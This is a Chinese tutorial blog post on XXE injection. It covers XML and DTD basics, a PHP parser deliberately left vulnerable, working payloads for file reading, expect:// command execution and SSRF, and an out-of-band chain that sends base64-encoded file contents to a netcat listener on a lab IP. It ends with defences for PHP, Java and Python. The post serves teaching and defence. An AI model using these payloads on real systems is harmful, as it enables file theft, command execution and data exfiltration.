当前位置:   article > 正文

XXE 学习_xxe命令执行

xxe命令执行

目录

XXE 是什么

XML介绍

XML文档的构建模块

DTD

实体引用

内部声明实体

DTD的引用方式

XML 实体

字符实体

命名实体

参数实体

内部实体注入

外部实体注入(XXE)

方式一:

方式二:

 XXE危害

1.读取任意文件

2.执行系统命令

3.探测内网窗口

4.内网探测/ssrf

XXE无回显的利用

XXE 的防御        

方案一

方案二


XXE 是什么

        XXE(XML External Entity Injection),即 XML 外部实体注入。

        当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。

XML介绍

        XML 指可扩展标记语言(Extensible Markup Language)。

        XML 是设计宗旨是传输数据,而不是显示数据。

        XML 是 W3C 的推荐标准

        XML 不会做任何事情。XML 被设计用来结构化,存储及传输信息。

        XML 语言么没有预定义的标签。

  1. XML语法基本格式
  2. <?xml version="1.0" encoding="UTF-8" standalone="yes" ?> <!-- XML文件的声明 -->
  3. <bookstore> <!-- 根元素 -->
  4. <book catengory="Cooking"> <!-- bookstore的子元素,catengory为属性 -->
  5. <title> Everyday italian </title> <!-- book的子元素 -->
  6. <author> GIAda De Laurentiis </author> <!-- book的子元素 -->
  7. <year> 2021 </year> <!-- book的子元素 -->
  8. <price> 50.00 </price> <!-- book的子元素 -->
  9. </book> <!-- book的结束 -->
  10. </bookstore> <!-- bookstore的结束 -->

        所有的 XML 元素都需要关闭标签

        XML 标签对大小写敏感

        XML 必须正确的嵌套

        XML 文档必须有且只有一个根元素

        XML 的属性值必须加引号

        可以将多个字符放入 <![CDATA[内容]]> 进行转义

  1. XML 标准格式
  2. <?xml version="1.0" encoding="UTF-8 ?> <!-- XML声明 -->
  3. <!-- 文档类型定义 -->
  4. <!DOCTYPE note[
  5. <! ELEMENT note (to,from,heading,body))>
  6. <! ELEMENT to (#PCDATA))>
  7. <! ELEMENT from (#PCDATA))>
  8. <! ELEMENT heading (#PCDATA))>
  9. <! ELEMENT body (#PCDATA))>
  10. ]>
  11. <!-- 文档元素 -->
  12. <note>
  13. <to> George </to>
  14. <from> John </from>
  15. <heading> Reminder </heading>
  16. <body> Don't forget the meeting ! </body>
  17. </note>

XML文档的构建模块

所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成:

        1.元素

        元素是 XML 以及 HTML 文档的主要构建模块,元素可包含文本、其他元素或者是空的。

        2.属性

        属性可提供有关元素的额外信息

        3.实体

        实体是用来定义普通文本的变量。实体引用是对实体的引用。

       4. PCDATA

        PCDATA 的意思是被解析的字符数据(parsed character data)。
        PCDATA 是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。

        5.CDATA

        CDATA指的是不应由 XML 解析器进行解析的文本数据(unparesed Character Data)

        在 XML 元素中,"<" (新元素的开始) 和 "&" (字符实体的开始)是非法的。

        某些文本,如JavaScript代码,包含大量 "<" 或 "&" 字符。为例避免错误,可以将脚本代码定义为 CDATA。

        CDATA 部分在的所有内容都会被解析器忽略。

        CDATA 部分由 "<![CDATA["开始,由"]]>" 结束。

DTD

        XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD (document type definition)的东西控制的。

        DTD 用来为 XML 文档定义语义约束。可以嵌套在 XML 文档中(内部声明),也可以独立放在另一个单独的文件中(外部引用)。是 XML 文档的几条1语句,用来说明哪些元素/属性是合法的,以及元素件应该怎么嵌套/组合,也用来将一些特殊字符和可复用代码段自定义为实体。

实体引用

XML元素,例如<tag>hello</tag>,如果元素内部出现如 < 的特殊字符,解析就会失败,为了避免这种情况1,XML 用实体引用(entity reference) 替换特殊字符。XML 预定义五个实体引用。

预定义字符转义后的预定义字符
<&lt;
>&gt;
&&amp;
'&apos;
"&quot;

        实体引用可以起到类似宏定义和文件包含的效果,为例方便,我们会希望自定义实体引用,这个操作在 DTD 的过程中进行。

内部声明实体

DTD 实体是用于定义普通文本或特殊字符的快捷方式的变量,可以内部声明或外部声明。

内部实体声明:<!ENTITY 实体名称 "实体的值">

        注:一个实体有三部分组成( 1.一个&,2.一个实体名称,3.一个;)

DTD的引用方式

        内部DTD      

                使用内部的 DTD 文件,就是将规则定义在 XML 文件中。

  1. <?xml version="1.0" encoding="UTF-8 ?> <!-- XML声明 -->
  2. <!DOCTYPE note[ <!-- 定义此文档是 note 类型 -->
  3. <!ELEMENT note (to,from,heading,body))> <!-- 定义to 元素为 PCDATA 类型-->
  4. <!ELEMENT to (#PCDATA))>
  5. <!ELEMENT from (#PCDATA))>
  6. <!ELEMENT heading (#PCDATA))>
  7. <!ELEMENT body (#PCDATA))>
  8. ]>
  9. <note>
  10. <to> George </to>
  11. <from> John </from>
  12. <heading> Reminder </heading>
  13. <body> Don't forget the meeting ! </body>
  14. </note>

        外部DTD

                引入人外部的 DTD 文件

  1. 引用外部的 DTD 文件:<!DOCTYPE 根元素名称 SYSTEM "DTD路径">
  2. 引用外部的 DTD 文件(网络上的 DTD 文件):<!DOCTYPE 根元素名称 PUBLIC "DTD文档的URL">
  3. 当使用外部 DTD 时,使用引入语法:<!DOCTYPE root-element SYSTEM "filename">

XML 实体

        XML 中的实体分为以下五种:字符实体,命名实体,外部实体,内部实体,参数实体。普通实体和参数实体都分为内部实体和外部实体两种,外部实体定义需要加上 SYSTEM 关键字,其内容是 URL 指向的外部文件的实际内容。如果不加 SYSTEM 关键字,则为内部实体,表示实体代指内容为字符串。

字符实体

预定义字符转义后的预定义字符
<&lt;
>&gt;
&&amp;
'&apos;
"&quot;

命名实体

        也称为内部实体,在 DTD 或内部子集(及文档中<!DOCTYPE>语句的一部分)中声明,在文档中用作引用。在 XML 文档解析过程中,实体引用将由他的表示代替。

  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE ANY[
  3. <!ENTITY xxe SYSTEM "file:///C://test/1.txt" >
  4. ]>
  5. <value>&xxe;</value>

参数实体

        参数实体只是用于 DTD 和文档的内部子集中,XML 的规范定义在,只有在 DTD 中才能引用参数实体,参数实体的声明和引用都是以 %,并且参数实体的引用在 DTD 是理解解析的,替换文本将标称 DTD 的一部分。该类型的实体用 % 字符(或十六进制编码的%)声明,并且仅在经解析验证后才用于替换 DTD 中的文本或其他内容。

  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE ANTHER [
  3. <!ENTITY % first "hello" >
  4. <!Entity % second "&first;_world">
  5. %second;
  6. ]>

内部实体注入

  1. <?php
  2. libxml_disable_entity_loader(false); //禁用实体加载器
  3. $xmlfile = file_get_contents('php://input');
  4. $dom = new DOMDocument();
  5. $dom->loadXML($xmlfile,LIBXML_NOENT | LIBXML_DTDLOAD); //导入字符长,生成XML对象
  6. $creds = simplexml_import_dom($dom);
  7. echo $creds;

外部实体注入(XXE)

  1. XML.php 文件
  2. <?php
  3. libxml_disable_entity_loader(false);
  4. $xmlfile = file_get_contents('php://input');
  5. $dom = new DOMDocument();
  6. $dom->loadXML($xmlfile,LIBXML_NOENT | LIBXML_DTDLOAD);
  7. $creds = simplexml_import_dom($dom);
  8. echo $creds;

方式一:

直接通过DTD外部实体声明

  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE creds [
  3. <!ENTITY goodies SYSTEM "file:///C:/Test/test.txt" > ]>
  4. <creds>&goodies;</creds>

方式二:

通过DTD文档引入外部DTD文档,再引入外部实体声明

  1. DTD.dtd 文件
  2. <!ENTITY goodies SYSTEM "file:///C:/Test/test.txt">
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE test SYSTEM "http://192.168.11.135/Test/DTD.dtd">
  3. <creds>&goodies;</creds>

 XXE危害

1.读取任意文件

  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE creds [
  3. <!ENTITY goodies SYSTEM "file:///文件路径" > ]>
  4. <creds>&goodies;</creds>

2.执行系统命令

  1. 注:需要 PHP 开 expect 扩展
  2. <?xml version="1.0" encoding="UTF-8" ?>
  3. <!DOCTYPE creds [
  4. <!ENTITY goodies SYSTEM "expect://whoami" > ]>
  5. <creds>&goodies;</creds>

3.探测内网窗口

4.内网探测/ssrf

        可以利用http://协议,也就是可以发起http请求。可以利用该请求去探查内网,进行SSRF攻击。

XXE无回显的利用

  1. 发送给漏洞服务器的包
  2. <?xml version="1.0" encoding="UTF-8" ?>
  3. <!DOCTYPE ANY[
  4. <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///C:/Windows/win.ini">
  5. <!ENTITY % dtd SYSTEM "http://www.localhost.com/Test/DTD.dtd">
  6. %dtd;
  7. %send;
  8. ]>
  9. 使用外部实体来包含要读取的 C:/Windows/win.ini 文件内容
  10. 使用外部实体读取对应网址下的 dtd 文件,并执行
  1. DTD.dtd 文件内容
  2. <!ENTITY % all
  3. "<!ENTITY &#x25; send SYSTEM 'http://192.168.11.130:1234/?%file;'>"
  4. >
  5. %all;
  6. 将读取到的文件内容发送给
  7. 192.168.11.130:1234 :监听主机对应的IP及端口
  8. 在监听主机上监听指定端口(nc -vnlp 1234)

 

XXE 的防御        

方案一

         使用开发语言提供的禁用外部实体的方法

  1. PHP:
  2. libxml_disable_entity_loader(?); // ?:true为禁用,false为启用
  3. JAVA:
  4. DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
  5. dbf.setExpandEntityReferences(false);
  6. Python:
  7. from lxml import etree
  8. xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案二

        过滤用户提交的XML数据

        关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。        

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/589963
推荐阅读
相关标签
  

闽ICP备14008679号